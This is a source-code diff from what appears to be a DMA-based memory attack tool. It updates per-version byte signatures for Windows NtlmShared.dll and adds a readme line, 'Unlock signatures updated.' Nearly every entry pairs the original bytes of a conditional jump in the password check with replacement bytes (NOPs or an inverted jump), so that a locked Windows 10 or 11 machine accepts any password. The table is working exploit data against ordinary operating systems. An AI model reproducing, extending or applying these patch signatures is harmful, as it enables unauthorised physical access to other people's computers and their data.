+			{ .cbOffset = 0x6E8,.cb =  6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
+			{ .cbOffset = 0x6E8,.cb =  6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
 		},
-		// Windows 10 x64 [NtlmShared.dll (2018-04-11)/10.0.17134.1]
-        { .chunk = {
-            { .cbOffset = 0x695,.cb = 4,.pb = { 0xff, 0x15, 0x55, 0x1c } },
-            { .cbOffset = 0x69e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } },
-            { .cbOffset = 0x69e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
-        },
-		// Windows 10 x64 [NtlmShared.dll (2019-10-02)/10.0.17134.1067]
-		{.chunk = {
-			{.cbOffset = 0x6ab,.cb = 6,.pb = { 0x49, 0x3B, 0xC6, 0x0F, 0x85, 0x2E } },
-			{.cbOffset = 0x6b1,.cb = 5,.pb = { 0xFB, 0xFF, 0xFF, 0xB0, 0x01 } },
-			{.cbOffset = 0x6af,.cb = 1,.pb = { 0x84 } } }
-		},
-		// Windows 10 x64 [NtlmShared.dll (2018-09-15)/10.0.17763.1]
-		{.chunk = {
-			{.cbOffset = 0x740,.cb = 4,.pb = { 0xff, 0x15, 0xb2, 0x1b } },
-			{.cbOffset = 0x749,.cb = 4,.pb = { 0x0f, 0x84, 0x0b, 0xfb } },
-			{.cbOffset = 0x749,.cb = 2,.pb = { 0x0f, 0x85 } } }
-		},
-		// Windows 10 x64 [NtlmShared.dll (2019-03-19)/10.0.18362.1]
-		// Windows 10 x64 [NtlmShared.dll (2019-10-06)/10.0.18362.418]
-		{.chunk = {
-			{.cbOffset = 0x741,.cb = 6,.pb = { 0x32, 0xC0, 0xE9, 0x04, 0xFB, 0xFF } },
-			{.cbOffset = 0x741,.cb = 6,.pb = { 0x32, 0xC0, 0xE9, 0x04, 0xFB, 0xFF } },
-			{.cbOffset = 0x741,.cb = 2,.pb = { 0xb0, 0x01 } } }
-		},
-		// Windows 10 x64 [NtlmShared.dll (2019-12-07)/10.0.19041.1]
-		{.chunk = {
-			{.cbOffset = 0x426,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0x53, 0x20 } },
-			{.cbOffset = 0x435,.cb = 6,.pb = { 0x0f, 0x84, 0xba, 0xfa, 0xff, 0xff } },
-			{.cbOffset = 0x435,.cb = 2,.pb = { 0x0f, 0x85 } } }
-		},
-		// Windows 10 x64 [NtlmShared.dll (2022-08-04)/10.0.19041.1889]
-		{.chunk = {
-			{.cbOffset = 0x4B6,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0xc3, 0x1f } },
-			{.cbOffset = 0x4c5,.cb = 6,.pb = { 0x0f, 0x84, 0xba, 0xfa, 0xff, 0xff } },
-			{.cbOffset = 0x4c5,.cb = 2,.pb = { 0x0f, 0x85 } } }
-		},
-		// Windows Server2022 x64 [NtlmShared.dll (2022-08-04)/10.0.20348.887]
-		{.chunk = {
-			{.cbOffset = 0xa6e,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0xb3, 0x28 } },
-			{.cbOffset = 0xa7d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } },
-			{.cbOffset = 0xa7d,.cb = 2,.pb = { 0x0f, 0x85 } } }
-		},
-		// Windows 11 x64 [NtlmShared.dll (2021-06-05)/10.0.22000.1]
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.2791 / 2019-02-06]
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.3269 / 2019-09-29]
 		{ .chunk = {
-			{.cbOffset = 0xf8b,.cb = 5,.pb = { 0x48, 0x8b, 0xcb, 0x48, 0xff } },
-			{.cbOffset = 0xf9d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } },
-			{.cbOffset = 0xf9d,.cb = 2,.pb = { 0x0f, 0x85 } } }
+			{ .cbOffset = 0x6EC,.cb =  9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC3, 0x1B, 0x00, 0x00 } },
+			{ .cbOffset = 0x6F8,.cb =  6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
+			{ .cbOffset = 0x6F8,.cb =  6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
 		},
-		// Windows 11 x64 [NtlmShared.dll (2022-08-04)/10.0.22000.856]
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.5291 / 2022-08-07]
 		{ .chunk = {
-			{.cbOffset = 0x00b,.cb = 5,.pb = { 0x48, 0x8b, 0xcb, 0x48, 0xff } },
-			{.cbOffset = 0x01d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } },
-			{.cbOffset = 0x01d,.cb = 2,.pb = { 0x0f, 0x85 } } }
+			{ .cbOffset = 0x76C,.cb =  9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x43, 0x1B, 0x00, 0x00 } },
+			{ .cbOffset = 0x778,.cb =  6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
+			{ .cbOffset = 0x778,.cb =  6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
 		},
-		// Windows 11 x64 [NtlmShared.dll (2022-08-05)/10.0.22621.382]
-		// Windows 11 x64 [NtlmShared.dll (2022-09-27)/10.0.22621.608]
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.5850 / 2023-03-30]
 		{ .chunk = {
-			{.cbOffset = 0xFBD,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0x3c, 0x23 } },
-			{.cbOffset = 0xFCC,.cb = 6,.pb = { 0x0f, 0x85, 0xc4, 0xfa, 0xff, 0xff } },
-			{.cbOffset = 0xFCC,.cb = 2,.pb = { 0x0f, 0x85 } } }
+			{ .cbOffset = 0x77C,.cb =  9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x33, 0x1B, 0x00, 0x00 } },
+			{ .cbOffset = 0x788,.cb =  6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
+			{ .cbOffset = 0x788,.cb =  6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
 		},
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.15063.1631 / 2019-02-06]
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.15063.2106 / 2019-09-30]
+		{ .chunk = {
+			{ .cbOffset = 0x622,.cb =  9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xB5, 0x1C, 0x00, 0x00 } },
+			{ .cbOffset = 0x62E,.cb =  6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
+			{ .cbOffset = 0x62E,.cb =  6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
+		},
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.15254.245 / 2018-01-30]
+		{ .chunk = {
+			{ .cbOffset = 0x612,.cb =  9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC5, 0x1C, 0x00, 0x00 } },
+			{ .cbOffset = 0x61E,.cb =  6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
+			{ .cbOffset = 0x61E,.cb =  6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
+		},
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.1268 / 2019-07-05]
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.1448 / 2019-10-02]
+		{ .chunk = {
+			{ .cbOffset = 0x622,.cb =  9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC5, 0x1C, 0x00, 0x00 } },
+			{ .cbOffset = 0x62E,.cb =  6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
+			{ .cbOffset = 0x62E,.cb =  6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
+		},
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.192 / 2018-01-01]
+		{ .chunk = {
+			{ .cbOffset = 0x612,.cb =  9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xD5, 0x1C, 0x00, 0x00 } },
+			{ .cbOffset = 0x61E,.cb =  6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
+			{ .cbOffset = 0x61E,.cb =  6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
+		},
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.1067 / 2019-10-02]
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.590 / 2019-02-06]
+		{ .chunk = {
+			{ .cbOffset = 0x6A2,.cb =  9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x45, 0x1C, 0x00, 0x00 } },
+			{ .cbOffset = 0x6AE,.cb =  6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
+			{ .cbOffset = 0x6AE,.cb =  6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
+		},
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.523 / 2019-01-01]
+		{ .chunk = {
+			{ .cbOffset = 0x692,.cb =  9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x55, 0x1C, 0x00, 0x00 } },
+			{ .cbOffset = 0x69E,.cb =  6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
+			{ .cbOffset = 0x69E,.cb =  6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
+		},
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.10935 / 2022-08-05]
+		{ .chunk = {
+			{ .cbOffset = 0x7CD,.cb =  9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x22, 0x1B, 0x00, 0x00 } },
+			{ .cbOffset = 0x7D9,.cb =  6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } },
+			{ .cbOffset = 0x7D9,.cb =  2,.pb = { 0x0F, 0x85 } } }
+		},
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.194 / 2018-12-04]
+		{ .chunk = {
+			{ .cbOffset = 0x73D,.cb =  9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xB2, 0x1B, 0x00, 0x00 } },
+			{ .cbOffset = 0x749,.cb =  6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } },
+			{ .cbOffset = 0x749,.cb =  2,.pb = { 0x0F, 0x85 } } }
+		},
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.316 / 2019-02-06]
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.802 / 2019-10-02]
+		{ .chunk = {
+			{ .cbOffset = 0x74D,.cb =  9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xA2, 0x1B, 0x00, 0x00 } },
+			{ .cbOffset = 0x759,.cb =  6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } },
+			{ .cbOffset = 0x759,.cb =  2,.pb = { 0x0F, 0x85 } } }
+		},
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.5122 / 2023-11-08]
+		{ .chunk = {
+			{ .cbOffset = 0x7DD,.cb =  9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x12, 0x1B, 0x00, 0x00 } },
+			{ .cbOffset = 0x7E9,.cb =  6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } },
+			{ .cbOffset = 0x7E9,.cb =  2,.pb = { 0x0F, 0x85 } } }
+		},
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.1 / 2019-03-18]
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.10022 / 2019-09-15]
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.418 / 2019-10-06]
+		{ .chunk = {
+			{ .cbOffset = 0x72F,.cb =  9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC0, 0x1B, 0x00, 0x00 } },
+			{ .cbOffset = 0x73B,.cb =  6,.pb = { 0x0F, 0x84, 0x09, 0xFB, 0xFF, 0xFF } },
+			{ .cbOffset = 0x73B,.cb =  2,.pb = { 0x0F, 0x85 } } }
+		},
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.1 / 2019-12-07]
+		{ .chunk = {
+			{ .cbOffset = 0x423,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0x53, 0x20, 0x00, 0x00 } },
+			{ .cbOffset = 0x435,.cb =  6,.pb = { 0x0F, 0x84, 0xBA, 0xFA, 0xFF, 0xFF } },
+			{ .cbOffset = 0x435,.cb =  2,.pb = { 0x0F, 0x85 } } }
+		},
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.2728 / 2023-03-09]
+		{ .chunk = {
+			{ .cbOffset = 0x4B3,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xC3, 0x1F, 0x00, 0x00 } },
+			{ .cbOffset = 0x4C5,.cb =  6,.pb = { 0x0F, 0x84, 0xBA, 0xFA, 0xFF, 0xFF } },
+			{ .cbOffset = 0x4C5,.cb =  2,.pb = { 0x0F, 0x85 } } }
+		},
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.2965 / 2023-04-27]
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.3636 / 2023-10-20]
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.3684 / 2023-10-17]
+		{ .chunk = {
+			{ .cbOffset = 0x4C3,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xB3, 0x1F, 0x00, 0x00 } },
+			{ .cbOffset = 0x4D5,.cb =  6,.pb = { 0x0F, 0x84, 0xBA, 0xFA, 0xFF, 0xFF } },
+			{ .cbOffset = 0x4D5,.cb =  2,.pb = { 0x0F, 0x85 } } }
+		},
+		// Signature for Windows 11 x64 [NtlmShared.dll 10.0.20348.1668 / 2023-03-30]
+		{ .chunk = {
+			{ .cbOffset = 0xA7B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xA3, 0x28, 0x00, 0x00 } },
+			{ .cbOffset = 0xA8D,.cb =  6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
+			{ .cbOffset = 0xA8D,.cb =  2,.pb = { 0x0F, 0x85 } } }
+		},
+		// Signature for Windows 11 x64 [NtlmShared.dll 10.0.20348.887 / 2022-08-04]
+		{ .chunk = {
+			{ .cbOffset = 0xA6B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xB3, 0x28, 0x00, 0x00 } },
+			{ .cbOffset = 0xA7D,.cb =  6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
+			{ .cbOffset = 0xA7D,.cb =  2,.pb = { 0x0F, 0x85 } } }
+		},
+		// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.1696 / 2023-03-09]
+		{ .chunk = {
+			{ .cbOffset = 0x00B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xE3, 0x22, 0x00, 0x00 } },
+			{ .cbOffset = 0x01D,.cb =  6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
+			{ .cbOffset = 0x01D,.cb =  2,.pb = { 0x0F, 0x85 } } }
+		},
+		// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.2600 / 2023-11-08]
+		{ .chunk = {
+			{ .cbOffset = 0x01B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xD3, 0x22, 0x00, 0x00 } },
+			{ .cbOffset = 0x02D,.cb =  6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
+			{ .cbOffset = 0x02D,.cb =  2,.pb = { 0x0F, 0x85 } } }
+		},
+		// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.778 / 2022-06-18]
+		{ .chunk = {
+			{ .cbOffset = 0xF8B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0x63, 0x23, 0x00, 0x00 } },
+			{ .cbOffset = 0xF9D,.cb =  6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
+			{ .cbOffset = 0xF9D,.cb =  2,.pb = { 0x0F, 0x85 } } }
+		},
+		// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2067 / 2023-07-11]
+		// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2506 / 2023-10-19]
+		// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2567 / 2023-10-14]
+		{ .chunk = {
+			{ .cbOffset = 0xFC9,.cb = 11,.pb = { 0x48, 0x8D, 0x4B, 0x10, 0x48, 0xFF, 0x15, 0x2C, 0x23, 0x00, 0x00 } },
+			{ .cbOffset = 0xFDC,.cb =  6,.pb = { 0x0F, 0x85, 0xC4, 0xFA, 0xFF, 0xFF } },
+			{ .cbOffset = 0xFDC,.cb =  6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
+		},
+
 	};
 	KERNEL_FUNCTIONS2 fnk2;
 	PPHYSICAL_MEMORY_RANGE pMemMap, pMM;
diff --git a/readme.md b/readme.md
index cdb96bf..c75f0b3 100644
--- a/readme.md
+++ b/readme.md
@@ -296,4 +296,5 @@ v4.1
 * Linux PCIe FPGA performance improvements.
 
 Latest:
-* benchmark command added.
+* Benchmark command added.
+* Unlock signatures updated.